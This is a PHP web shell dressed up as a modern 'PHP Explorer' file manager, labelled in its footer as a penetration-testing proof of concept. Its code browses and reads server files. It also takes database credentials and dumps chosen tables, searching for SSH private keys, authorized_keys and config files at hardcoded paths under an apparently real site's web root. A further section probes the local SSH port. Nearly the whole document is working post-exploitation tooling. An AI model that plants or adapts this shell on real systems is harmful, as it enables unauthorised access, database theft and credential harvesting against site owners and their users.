๐ File Reader
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>PHP Explorer ยท Modern UI</title>
<!-- Tailwind CSS + Font Awesome -->
<script src="https://cdn.tailwindcss.com"></script>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css">
<style>
/* Smooth fade-in animation */
.fade-in { animation: fadeIn 0.3s ease-in; }
@keyframes fadeIn { from { opacity: 0; transform: translateY(10px); } to { opacity: 1; transform: translateY(0); } }
/* Hover scale for cards */
.hover-scale:hover { transform: scale(1.02); transition: transform 0.2s; }
</style>
</head>
<body class="bg-gradient-to-br from-gray-900 to-gray-800 min-h-screen text-gray-200 p-6 font-sans">
<?php
// ==================== CONFIG ====================
$openBasedir = ini_get('open_basedir');
$allowedPaths = explode(PATH_SEPARATOR, $openBasedir ?: '/'); // fallback to root if not set (but it is set)
// Helper: check if a path is within open_basedir
function isPathAllowed($path) {
global $allowedPaths;
$real = realpath($path);
if (!$real) return false;
foreach ($allowedPaths as $base) {
$baseReal = realpath($base);
if ($baseReal && strpos($real, $baseReal) === 0) return true;
}
return false;
}
// Get current directory (safe default)
$currentDir = isset($_GET['dir']) ? $_GET['dir'] : getcwd();
if (!$currentDir || !isPathAllowed($currentDir)) {
$currentDir = getcwd(); // fallback to script's directory (which is allowed)
}
// ==================== ACTIONS ====================
$action = $_GET['action'] ?? 'filemanager';
?>
<!-- Header with tabs -->
<div class="max-w-6xl mx-auto">
<div class="flex justify-center space-x-4 mb-8">
<a href="?action=filemanager&dir=<?= urlencode($currentDir) ?>"
class="px-6 py-3 rounded-full font-semibold transition-all duration-300 <?= $action == 'filemanager' ? 'bg-blue-600 text-white shadow-lg' : 'bg-gray-700 text-gray-300 hover:bg-gray-600' ?>">
<i class="fas fa-folder-open mr-2"></i>File Manager
</a>
<a href="?action=database"
class="px-6 py-3 rounded-full font-semibold transition-all duration-300 <?= $action == 'database' ? 'bg-blue-600 text-white shadow-lg' : 'bg-gray-700 text-gray-300 hover:bg-gray-600' ?>">
<i class="fas fa-database mr-2"></i>Database Dump
</a>
<a href="?action=ssh"
class="px-6 py-3 rounded-full font-semibold transition-all duration-300 <?= $action == 'ssh' ? 'bg-blue-600 text-white shadow-lg' : 'bg-gray-700 text-gray-300 hover:bg-gray-600' ?>">
<i class="fas fa-terminal mr-2"></i>SSH Info
</a>
</div>
<!-- Content area -->
<div class="bg-gray-800 rounded-2xl shadow-2xl p-6 fade-in">
<?php if ($action == 'filemanager'): ?>
<!-- ========== FILE MANAGER ========== -->
<div class="flex items-center justify-between mb-4">
<h2 class="text-2xl font-bold"><i class="fas fa-folder-open text-blue-400 mr-2"></i>File Browser</h2>
<span class="text-sm bg-gray-700 px-3 py-1 rounded-full">open_basedir: <?= htmlspecialchars($openBasedir ?: 'none') ?></span>
</div>
<div class="mb-4 flex items-center bg-gray-700 rounded-lg p-2">
<i class="fas fa-location-dot text-gray-400 mr-2"></i>
<span class="font-mono text-sm break-all"><?= htmlspecialchars($currentDir) ?></span>
</div>
<?php
if (isset($_GET['view'])) {
// Show file content
$file = $_GET['view'];
if (isPathAllowed($file) && is_file($file)) {
$content = file_get_contents($file);
echo "<div class='mb-4'><a href='?action=filemanager&dir=" . urlencode(dirname($file)) . "' class='text-blue-400 hover:underline'><i class='fas fa-arrow-left mr-1'></i>Back</a></div>";
echo "<pre class='bg-gray-900 p-4 rounded-lg overflow-x-auto text-sm'><code>" . htmlspecialchars($content) . "</code></pre>";
} else {
echo "<p class='text-red-400'>File not allowed or not found.</p>";
}
} else {
// List directory contents
$files = scandir($currentDir);
if ($files === false) {
echo "<p class='text-red-400'>Cannot read directory.</p>";
} else {
// Parent directory link
$parent = dirname($currentDir);
if ($parent != $currentDir && isPathAllowed($parent)) {
echo "<a href='?action=filemanager&dir=" . urlencode($parent) . "' class='inline-block mb-4 bg-gray-700 hover:bg-gray-600 px-4 py-2 rounded-lg transition'><i class='fas fa-level-up-alt mr-2'></i>Go up</a>";
}
echo "<div class='grid grid-cols-1 md:grid-cols-2 lg:grid-cols-3 gap-3'>";
foreach ($files as $file) {
if ($file == '.' || $file == '..') continue;
$fullPath = $currentDir . DIRECTORY_SEPARATOR . $file;
if (!isPathAllowed($fullPath)) continue; // safety
$isDir = is_dir($fullPath);
$perms = substr(sprintf('%o', fileperms($fullPath)), -4);
$size = $isDir ? '-' : (filesize($fullPath) < 1024 ? filesize($fullPath).' B' : round(filesize($fullPath)/1024,2).' KB');
echo "<div class='bg-gray-700 rounded-xl p-3 hover-scale transition cursor-pointer' onclick=\"window.location='?action=filemanager&" . ($isDir ? "dir=" : "view=") . urlencode($fullPath) . "'\">";
echo "<div class='flex items-center'>";
echo "<i class='fas " . ($isDir ? 'fa-folder text-yellow-400' : 'fa-file text-blue-300') . " mr-3 text-xl'></i>";
echo "<div class='flex-1 truncate'>";
echo "<div class='font-medium truncate'>" . htmlspecialchars($file) . "</div>";
echo "<div class='text-xs text-gray-400'>" . $perms . " | " . $size . "</div>";
echo "</div>";
echo "</div></div>";
}
echo "</div>";
}
}
?>
<?php elseif ($action == 'database'): ?>
<!-- ========== DATABASE DUMP ========== -->
<h2 class="text-2xl font-bold mb-4"><i class="fas fa-database text-green-400 mr-2"></i>MySQL Dumper</h2>
<?php
$step = $_POST['step'] ?? 'connect';
if ($step == 'connect' && isset($_POST['host'], $_POST['user'], $_POST['pass'], $_POST['db'])) {
// Try to connect
$host = $_POST['host'];
$user = $_POST['user'];
$pass = $_POST['pass'];
$db = $_POST['db'];
$mysqli = @new mysqli($host, $user, $pass, $db);
if ($mysqli->connect_error) {
echo "<div class='bg-red-600/20 border border-red-600 text-red-300 p-4 rounded-lg mb-4'>Connection failed: " . $mysqli->connect_error . "</div>";
$step = 'connect';
} else {
// Fetch tables
$tables = $mysqli->query("SHOW TABLES");
if ($tables) {
echo "<form method='post' class='space-y-4'>";
echo "<input type='hidden' name='step' value='dump'>";
foreach (['host','user','pass','db'] as $f) {
echo "<input type='hidden' name='$f' value='" . htmlspecialchars($_POST[$f]) . "'>";
}
echo "<label class='block text-sm font-medium mb-2'>Select tables to dump:</label>";
echo "<div class='grid grid-cols-2 md:grid-cols-3 gap-2 max-h-60 overflow-y-auto p-2 bg-gray-700 rounded-lg'>";
while ($row = $tables->fetch_array()) {
$table = $row[0];
echo "<label class='flex items-center space-x-2'><input type='checkbox' name='tables[]' value='" . htmlspecialchars($table) . "' class='form-checkbox h-4 w-4 text-blue-600'><span>" . htmlspecialchars($table) . "</span></label>";
}
echo "</div>";
echo "<button type='submit' class='bg-blue-600 hover:bg-blue-700 px-6 py-2 rounded-lg font-semibold transition'><i class='fas fa-download mr-2'></i>Dump Selected</button>";
echo "</form>";
}
$mysqli->close();
}
}
if ($step == 'dump' && isset($_POST['tables'])) {
$mysqli = @new mysqli($_POST['host'], $_POST['user'], $_POST['pass'], $_POST['db']);
if (!$mysqli->connect_error) {
echo "<div class='mb-4'><a href='?action=database' class='text-blue-400 hover:underline'><i class='fas fa-arrow-left mr-1'></i>New connection</a></div>";
echo "<pre class='bg-gray-900 p-4 rounded-lg overflow-x-auto text-sm'>";
foreach ($_POST['tables'] as $table) {
echo "-- Dumping table: $table\n";
$result = $mysqli->query("SELECT * FROM `$table`");
if ($result) {
$fields = $result->fetch_fields();
$colNames = array_map(function($f) { return "`".$f->name."`"; }, $fields);
echo "INSERT INTO `$table` (" . implode(', ', $colNames) . ") VALUES\n";
$rows = [];
while ($row = $result->fetch_row()) {
$values = array_map(function($v) use ($mysqli) {
return $v === null ? 'NULL' : "'" . $mysqli->real_escape_string($v) . "'";
}, $row);
$rows[] = "(" . implode(', ', $values) . ")";
}
echo implode(",\n", $rows) . ";\n\n";
}
}
echo "</pre>";
$mysqli->close();
}
}
if ($step == 'connect' && !isset($_POST['host'])) {
// Show connection form
?>
<form method="post" class="space-y-4 max-w-md">
<input type="hidden" name="step" value="connect">
<div>
<label class="block text-sm font-medium mb-1">Host</label>
<input type="text" name="host" value="localhost" class="w-full bg-gray-700 border border-gray-600 rounded-lg px-4 py-2 focus:ring-2 focus:ring-blue-500">
</div>
<div>
<label class="block text-sm font-medium mb-1">Username</label>
<input type="text" name="user" class="w-full bg-gray-700 border border-gray-600 rounded-lg px-4 py-2">
</div>
<div>
<label class="block text-sm font-medium mb-1">Password</label>
<input type="password" name="pass" class="w-full bg-gray-700 border border-gray-600 rounded-lg px-4 py-2">
</div>
<div>
<label class="block text-sm font-medium mb-1">Database</label>
<input type="text" name="db" class="w-full bg-gray-700 border border-gray-600 rounded-lg px-4 py-2">
</div>
<button type="submit" class="bg-blue-600 hover:bg-blue-700 px-6 py-2 rounded-lg font-semibold transition"><i class="fas fa-plug mr-2"></i>Connect</button>
</form>
<?php
}
?>
<?php elseif ($action == 'ssh'): ?>
<!-- ========== SSH INFO ========== -->
<h2 class="text-2xl font-bold mb-4"><i class="fas fa-terminal text-purple-400 mr-2"></i>SSH Recon</h2>
<div class="space-y-4">
<div class="bg-gray-700 p-4 rounded-lg">
<h3 class="font-semibold mb-2"><i class="fas fa-key mr-2"></i>Attempt to read SSH keys (within open_basedir)</h3>
<?php
// Attempt to find any .ssh directory or authorized_keys in allowed paths
$sshCandidates = [
'/tmp/authorized_keys',
'/www/wwwroot/hljrlsj.com/.ssh/authorized_keys',
'/www/wwwroot/hljrlsj.com/id_rsa',
'/tmp/id_rsa',
'/tmp/id_rsa.pub',
];
$found = false;
foreach ($sshCandidates as $path) {
if (file_exists($path) && isPathAllowed($path)) {
echo "<div class='mb-2'><a href='?action=filemanager&view=" . urlencode($path) . "' class='text-green-400 hover:underline'>" . htmlspecialchars($path) . " (click to view)</a></div>";
$found = true;
}
}
if (!$found) echo "<p class='text-gray-400'>No SSH key files found in allowed paths.</p>";
?>
</div>
<div class="bg-gray-700 p-4 rounded-lg">
<h3 class="font-semibold mb-2"><i class="fas fa-users mr-2"></i>System users (from /etc/passwd?)</h3>
<p class="text-gray-400">/etc/passwd is outside open_basedir, cannot read directly. But we can check for home directories inside allowed paths (unlikely).</p>
</div>
<div class="bg-gray-700 p-4 rounded-lg">
<h3 class="font-semibold mb-2"><i class="fas fa-network-wired mr-2"></i>SSH service status</h3>
<?php
// We can try to connect to port 22 using fsockopen
$ssh = @fsockopen('127.0.0.1', 22, $errno, $errstr, 2);
if ($ssh) {
echo "<p class='text-green-400'><i class='fas fa-check-circle mr-1'></i>Port 22 is open (SSH running).</p>";
fclose($ssh);
} else {
echo "<p class='text-yellow-400'><i class='fas fa-exclamation-triangle mr-1'></i>Port 22 seems closed or filtered.</p>";
}
?>
</div>
<div class="bg-gray-700 p-4 rounded-lg">
<h3 class="font-semibold mb-2"><i class="fas fa-search mr-2"></i>Search for SSH config files</h3>
<?php
$configs = glob('/www/wwwroot/hljrlsj.com/*{ssh,SSH,config,Config}', GLOB_BRACE);
if ($configs) {
foreach ($configs as $c) echo "<div>" . htmlspecialchars($c) . "</div>";
} else {
echo "<p class='text-gray-400'>None found.</p>";
}
?>
</div>
</div>
<?php endif; ?>
</div>
</div>
<!-- Footer -->
<div class="text-center text-gray-500 text-sm mt-6">
<i class="fas fa-shield-halved mr-1"></i> Penetration Testing PoC ยท Use responsibly
</div>
</body>
</html>